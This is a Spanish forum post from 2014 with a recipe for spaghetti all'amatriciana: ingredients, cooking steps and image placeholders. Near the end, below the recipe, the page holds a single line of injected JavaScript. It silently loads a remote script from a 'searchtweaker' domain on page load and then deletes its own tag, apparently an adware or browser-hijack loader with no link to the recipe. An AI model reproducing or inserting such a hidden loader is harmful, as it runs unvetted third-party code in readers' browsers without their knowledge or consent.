Ajenos
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.

Espaguetis a la amatriciana (con tocino y tomates)

Ir abajo

chef Espaguetis a la amatriciana (con tocino y tomates)

Mensaje por Lilith Miér 02 Abr 2014, 13:05

[Tienes que estar registrado y conectado para ver esa imagen]


Ingredientes: para 2 personas


- tocino de mejilla de cerdo (aconsejado) o bacon
- aceite de oliva extravirgen
- unos tomates ciruelos
- queso pecorino (queso de oveja curado)
- guindilla (una punta); pimienta negra en granos
- vino blanco seco (una tacita de café)

opcionales:
- cebollita o cebolla
- unas hojas de albahaca fresca 


Instrucciones:



Se rehoga a fuego muy bajo el tocino o el bacon en poco aceite extravirgen de oliva, considerando que suelta su grasa. No tiene que freir, solo fundirse la grasa.

Se pone el tocino en un plato, tapado con otro plato para que no se enfrie.

En la misma sartén se ponen los tomates (la cebollita si se utiliza), la guindilla, el vino blanco y se deja cocer hasta que el vino evapore.

Se saltea la pasta cocida al dente y colada junto a los tomates, el tocino, el queso de oveja rallado, la pimienta negra molida al momento.

Unas hojas de albahaca fresca y perfumada le dan un toque especial, aunque no caben en la receta original.

[Tienes que estar registrado y conectado para ver esa imagen]

Servidos ...

[Tienes que estar registrado y conectado para ver esa imagen]
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Lilith
Lilith
Ajen@


Volver arriba Ir abajo

Volver arriba


 
Permisos de este foro:
No puedes responder a temas en este foro.